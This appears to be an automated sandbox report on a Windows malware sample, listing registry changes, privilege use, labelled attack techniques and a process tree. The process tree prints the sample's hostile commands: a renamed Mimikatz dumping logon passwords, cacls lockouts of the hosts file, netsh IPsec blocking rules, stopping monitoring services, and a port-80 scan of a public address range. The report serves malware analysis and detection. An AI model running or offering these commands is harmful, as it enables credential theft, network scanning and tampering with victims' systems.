\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bgzdci.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language benegiqll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruznevtjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language byuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 780 cmd.exe 2000 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0009000000023bcf-6.dat nsis_installer_2 behavioral2/files/0x0008000000023c2f-15.dat nsis_installer_1 behavioral2/files/0x0008000000023c2f-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
lllgdyunt.exelllgdyunt.exelllgdyunt.exebyuzvnr.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ byuzvnr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" byuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump lllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" lllgdyunt.exe -
Modifies registry class 14 IoCs
Processes:
byuzvnr.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ byuzvnr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3332 schtasks.exe 1588 schtasks.exe 524 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
byuzvnr.exepid Process 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exepid Process 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exebyuzvnr.exebyuzvnr.exevfshost.exelllgdyunt.exeuieubf.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exelllgdyunt.exedescription pid Process Token: SeDebugPrivilege 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe Token: SeDebugPrivilege 4940 byuzvnr.exe Token: SeDebugPrivilege 4652 byuzvnr.exe Token: SeDebugPrivilege 452 vfshost.exe Token: SeDebugPrivilege 3756 lllgdyunt.exe Token: SeLockMemoryPrivilege 2964 uieubf.exe Token: SeLockMemoryPrivilege 2964 uieubf.exe Token: SeDebugPrivilege 452 lllgdyunt.exe Token: SeDebugPrivilege 4116 lllgdyunt.exe Token: SeDebugPrivilege 2424 lllgdyunt.exe Token: SeDebugPrivilege 3872 lllgdyunt.exe Token: SeDebugPrivilege 4136 lllgdyunt.exe Token: SeDebugPrivilege 920 lllgdyunt.exe Token: SeDebugPrivilege 3980 lllgdyunt.exe Token: SeDebugPrivilege 1676 lllgdyunt.exe Token: SeDebugPrivilege 4392 lllgdyunt.exe Token: SeDebugPrivilege 1468 lllgdyunt.exe Token: SeDebugPrivilege 4412 lllgdyunt.exe Token: SeDebugPrivilege 4516 lllgdyunt.exe Token: SeDebugPrivilege 3180 lllgdyunt.exe Token: SeDebugPrivilege 2308 lllgdyunt.exe Token: SeDebugPrivilege 2616 lllgdyunt.exe Token: SeDebugPrivilege 1532 lllgdyunt.exe Token: SeDebugPrivilege 2868 lllgdyunt.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exebyuzvnr.exebyuzvnr.exexohudmc.exebgzdci.exebyuzvnr.exepid Process 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe 4940 byuzvnr.exe 4940 byuzvnr.exe 4652 byuzvnr.exe 4652 byuzvnr.exe 2956 xohudmc.exe 4280 bgzdci.exe 5104 byuzvnr.exe 5104 byuzvnr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.execmd.exebyuzvnr.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 2212 wrote to memory of 780 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe 84 PID 2212 wrote to memory of 780 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe 84 PID 2212 wrote to memory of 780 2212 d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe 84 PID 780 wrote to memory of 2000 780 cmd.exe 86 PID 780 wrote to memory of 2000 780 cmd.exe 86 PID 780 wrote to memory of 2000 780 cmd.exe 86 PID 780 wrote to memory of 4940 780 cmd.exe 95 PID 780 wrote to memory of 4940 780 cmd.exe 95 PID 780 wrote to memory of 4940 780 cmd.exe 95 PID 4652 wrote to memory of 4516 4652 byuzvnr.exe 97 PID 4652 wrote to memory of 4516 4652 byuzvnr.exe 97 PID 4652 wrote to memory of 4516 4652 byuzvnr.exe 97 PID 4516 wrote to memory of 4800 4516 cmd.exe 99 PID 4516 wrote to memory of 4800 4516 cmd.exe 99 PID 4516 wrote to memory of 4800 4516 cmd.exe 99 PID 4516 wrote to memory of 536 4516 cmd.exe 100 PID 4516 wrote to memory of 536 4516 cmd.exe 100 PID 4516 wrote to memory of 536 4516 cmd.exe 100 PID 4516 wrote to memory of 4432 4516 cmd.exe 101 PID 4516 wrote to memory of 4432 4516 cmd.exe 101 PID 4516 wrote to memory of 4432 4516 cmd.exe 101 PID 4516 wrote to memory of 5004 4516 cmd.exe 102 PID 4516 wrote to memory of 5004 4516 cmd.exe 102 PID 4516 wrote to memory of 5004 4516 cmd.exe 102 PID 4516 wrote to memory of 4640 4516 cmd.exe 103 PID 4516 wrote to memory of 4640 4516 cmd.exe 103 PID 4516 wrote to memory of 4640 4516 cmd.exe 103 PID 4516 wrote to memory of 4136 4516 cmd.exe 104 PID 4516 wrote to memory of 4136 4516 cmd.exe 104 PID 4516 wrote to memory of 4136 4516 cmd.exe 104 PID 4652 wrote to memory of 2020 4652 byuzvnr.exe 108 PID 4652 wrote to memory of 2020 4652 byuzvnr.exe 108 PID 4652 wrote to memory of 2020 4652 byuzvnr.exe 108 PID 4652 wrote to memory of 2308 4652 byuzvnr.exe 113 PID 4652 wrote to memory of 2308 4652 byuzvnr.exe 113 PID 4652 wrote to memory of 2308 4652 byuzvnr.exe 113 PID 4652 wrote to memory of 4460 4652 byuzvnr.exe 115 PID 4652 wrote to memory of 4460 4652 byuzvnr.exe 115 PID 4652 wrote to memory of 4460 4652 byuzvnr.exe 115 PID 4652 wrote to memory of 2212 4652 byuzvnr.exe 118 PID 4652 wrote to memory of 2212 4652 byuzvnr.exe 118 PID 4652 wrote to memory of 2212 4652 byuzvnr.exe 118 PID 2212 wrote to memory of 5084 2212 cmd.exe 120 PID 2212 wrote to memory of 5084 2212 cmd.exe 120 PID 2212 wrote to memory of 5084 2212 cmd.exe 120 PID 5084 wrote to memory of 344 5084 wpcap.exe 121 PID 5084 wrote to memory of 344 5084 wpcap.exe 121 PID 5084 wrote to memory of 344 5084 wpcap.exe 121 PID 344 wrote to memory of 1908 344 net.exe 123 PID 344 wrote to memory of 1908 344 net.exe 123 PID 344 wrote to memory of 1908 344 net.exe 123 PID 5084 wrote to memory of 1368 5084 wpcap.exe 124 PID 5084 wrote to memory of 1368 5084 wpcap.exe 124 PID 5084 wrote to memory of 1368 5084 wpcap.exe 124 PID 1368 wrote to memory of 1028 1368 net.exe 126 PID 1368 wrote to memory of 1028 1368 net.exe 126 PID 1368 wrote to memory of 1028 1368 net.exe 126 PID 5084 wrote to memory of 5024 5084 wpcap.exe 127 PID 5084 wrote to memory of 5024 5084 wpcap.exe 127 PID 5084 wrote to memory of 5024 5084 wpcap.exe 127 PID 5024 wrote to memory of 2376 5024 net.exe 129 PID 5024 wrote to memory of 2376 5024 net.exe 129 PID 5024 wrote to memory of 2376 5024 net.exe 129 PID 5084 wrote to memory of 3940 5084 wpcap.exe 130
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\nqazjegtg\uieubf.exe"C:\Windows\TEMP\nqazjegtg\uieubf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Users\Admin\AppData\Local\Temp\d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe"C:\Users\Admin\AppData\Local\Temp\d4f38de003b66f392d524b5ad58c757d62c4156f73e6f00c5f8a977e1e295c6eN.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\byuzvnr.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2000
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4940
-
-
-
C:\Windows\klhnlzly\byuzvnr.exeC:\Windows\klhnlzly\byuzvnr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4800
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4136
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2308
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exeC:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1908
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1028
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4640 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3344 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2852 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4752 -
C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exeC:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hgpuenbvt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5060 -
C:\Windows\hgpuenbvt\Corporate\vfshost.exeC:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:452
-
-
-
